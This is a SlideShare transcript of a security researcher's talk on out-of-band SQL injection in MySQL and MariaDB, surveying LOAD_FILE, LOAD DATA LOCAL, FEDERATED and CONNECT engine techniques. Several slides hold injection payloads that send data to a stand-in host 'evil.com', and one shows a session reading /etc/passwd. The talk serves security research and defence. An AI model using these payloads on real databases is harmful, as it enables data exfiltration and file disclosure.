[Russia] MySQL OOB injections
1 like1,904 views
The document discusses various techniques for exploiting out-of-band SQL injections in MySQL, including using the LOAD_FILE, LOAD_DATA, and SELECT...INTO OUTFILE functions to retrieve files from the database server or operating system. It also covers using the FEDERATED and CONNECT storage engines to execute queries against remote databases.
![[Russia] MySQL OOB injections](https://image.slidesharecdn.com/mysqloobinjections-151026111448-lva1-app6892/85/Russia-MySQL-OOB-injections-6-320.jpg)
![[Russia] MySQL OOB injections](https://image.slidesharecdn.com/mysqloobinjections-151026111448-lva1-app6892/85/Russia-MySQL-OOB-injections-9-320.jpg)
![[Russia] MySQL OOB injections](https://image.slidesharecdn.com/mysqloobinjections-151026111448-lva1-app6892/85/Russia-MySQL-OOB-injections-11-320.jpg)
![MariaDB CONNECT ENGINE file access
MariaDB [test]> create table root(a varchar(1024))
engine=connect table_type=CSV file_name='/etc/passwd';
Query OK, 0 rows affected (0.00 sec)
MariaDB [test]> select * from root;
+-----------------------------------------------------------------------+
| a |
+-----------------------------------------------------------------------+
| root:x:0:0:root:/root:/bin/bash |
| bin:x:1:1:bin:/bin:/sbin/nologin |
| daemon:x:2:2:daemon:/sbin:/sbin/nologin |
| adm:x:3:4:adm:/var/adm:/sbin/nologin |
| lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin |
| sync:x:5:0:sync:/sbin:/bin/sync |
+-----------------------------------------------------------------------+
7 rows in set (0.01 sec)](https://image.slidesharecdn.com/mysqloobinjections-151026111448-lva1-app6892/85/Russia-MySQL-OOB-injections-15-320.jpg)
![[Russia] MySQL OOB injections](https://image.slidesharecdn.com/mysqloobinjections-151026111448-lva1-app6892/85/Russia-MySQL-OOB-injections-17-320.jpg)
[Russia] MySQL OOB injections
- 1. MySQL OOB injections Can I surprize you? @d0znpp
- 2. BIO @d0znpp ● Researcher ● Bug hunter ● Wallarm CEO
- 3. MySQL today ● MySQL (http://www.oracle.com/us/products/mysql/overview/index.html) ○ Enterprise Edition (http://www.oracle.com/us/products/mysql/mysqlenterprise/overview/index.html) ○ Standard Edition (http://www.oracle.com/us/products/mysql/mysqlstandard/overview/index.html) ○ Classic Edition (http://www.oracle.com/us/products/mysql/mysqlclassic/overview/index.html) ○ Community Edition (http://www.oracle.com/us/products/mysql/mysqlcommunityserver/overview/index.html) ○ Cluster CGE (http://www.oracle.com/us/products/mysql/mysqlcluster/overview/index.html) ○ Embedded (OEM/ISV) (http://www.oracle.com/us/products/mysql/mysqlembedded/overview/index.html) ● MariaDB (https://mariadb.org/) ● Percona (https://www.percona.com/) *out of scope
- 4. SQL injections summary ● Classic (data from query puts into response) a.k.a. “UNION SELECT” ● Blind (no SQL queries data puts into response) Blind SQli exploitation techniques: ● Using foreign objects (id='and(1<<(id-1)&length(load_file('/etc/passwd')))--) ● Error-based (when SQL errors puts into responses) ● Boolean search (when status code or smth. else indicates query status) ● Time-based (boolean search where query execution time indicates status) ● Out-of-band (OOB load_file(concat(‘’,version(),’.evil.comoob’)))
- 5. Why OOB? ● Faster ● Only one way to exploit asynchronous services What is asynchronous? ● I want to login. This is my credentials ● Ok. Wait... ● Is it ready? ● Is it ready?
- 7. MySQL injections overview ● Cheat sheets ○ http://pentestmonkey.net/cheat-sheet/sql-injection/mysql-sql-injection-cheat-sheet ○ https://rdot.org/forum/showthread.php?t=124 ● Latest error-based tricks: ○ EXP (https://www.exploit-db.com/docs/37953.pdf) ○ Non-geometric (https://rdot.org/forum/showpost.php?p=37133&postcount=1) ○ BIGINT UNSIGNED (https://rdot.org/forum/showthread.php?t=3167) ○ JSON_* (https://twitter.com/dsrbr/status/649963694533775360)
- 8. Out-of-band for MySQL and Windows UNC filenames on Windows systems (http://arxiv.org/pdf/1303.3047.pdf by Miroslav Štampar) ● LOAD_FILE(concat(‘’,version(),’.evil.comoob’)) function ● SELECT … INTO (OUTFILE | DUMPFILE) ‘...’ And also other file access variants: ● LOAD DATA (LOCAL) INFILE ‘...’
- 10. What you must know about “... LOCAL ...” ● LOAD DATA LOCAL INFILE executes on MySQL client. Not on server ● Client could define callback function for this (http://php.net/manual/ru/mysqli. set-local-infile-handler.php) ● By default this callback implemented in MySQL client driver ● This one supports all available wrappers in your platform ● LOAD DATA LOCAL INFILE ‘(http|php|expect|...)://...’ <- YES! Why not :) ● SSRF there
- 12. FEDERATED storage engine OOB ● Different storage engines: MEMORY, CSV, ... ● FEDERATED storage engine (https://dev.mysql.com/doc/refman/5. 7/en/federated-storage-engine.html and https://mariadb. com/kb/en/mariadb/about-federatedx/) ● CREATE TABLE … ENGINE=FEDERATED CONNECTION=’mysql://…’
- 13. CONNECT storage engine OOB (MariaDB) ● Different storage engines: MEMORY, CSV, ... ● CONNECT storage engine (https://mariadb.com/kb/en/mariadb/connect-table- types-mysql-table-type-accessing-mysqlmariadb-tables/ https://mariadb. com/kb/en/mariadb/connect-security/) ● OOB through MYSQL and ODBC table_type ● CREATE TABLE t(id int) engine=CONNECT table_type=MYSQL connection='mysql://root@evil.com/database/table; The use of the CONNECT engine requires the FILE privilege for "outward" tables. This should not be an important restriction. The use of CONNECT "outward" tables on a remote server seems of limited interest without knowing the files existing on it and must be protected anyway. On the other hand, using it on the local client machine is not an issue because it is always possible to create locally a user with the FILE privilege.
- 14. MariaDB CONNECT ENGINE file access All of these table types supports file_name argument: ● DOS ● DBF ● BIN ● CSV ● FMT ● XML (no XXE there, sorry :) ● JSON ● INI
- 15. MariaDB CONNECT ENGINE file access MariaDB [test]> create table root(a varchar(1024)) engine=connect table_type=CSV file_name='/etc/passwd'; Query OK, 0 rows affected (0.00 sec) MariaDB [test]> select * from root; +-----------------------------------------------------------------------+ | a | +-----------------------------------------------------------------------+ | root:x:0:0:root:/root:/bin/bash | | bin:x:1:1:bin:/bin:/sbin/nologin | | daemon:x:2:2:daemon:/sbin:/sbin/nologin | | adm:x:3:4:adm:/var/adm:/sbin/nologin | | lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin | | sync:x:5:0:sync:/sbin:/bin/sync | +-----------------------------------------------------------------------+ 7 rows in set (0.01 sec)
- 16. MariaDB CONNECT ENGINE piece of cheat https://mariadb.com/kb/en/mariadb/connect-table-types-special-virtual-tables/ … table_type=DIR file_name=’*.frm’ options=’subdir=1’ Also only for Windows: ● MAC (network adapter details) ● WMI (really)
- 18. Summary DBApp Evil host You SQL queries FEDERATED, CONNECT LOAD DATA|XML LOCAL UNC load_file, INTO OUTFILE|DUMPF ILE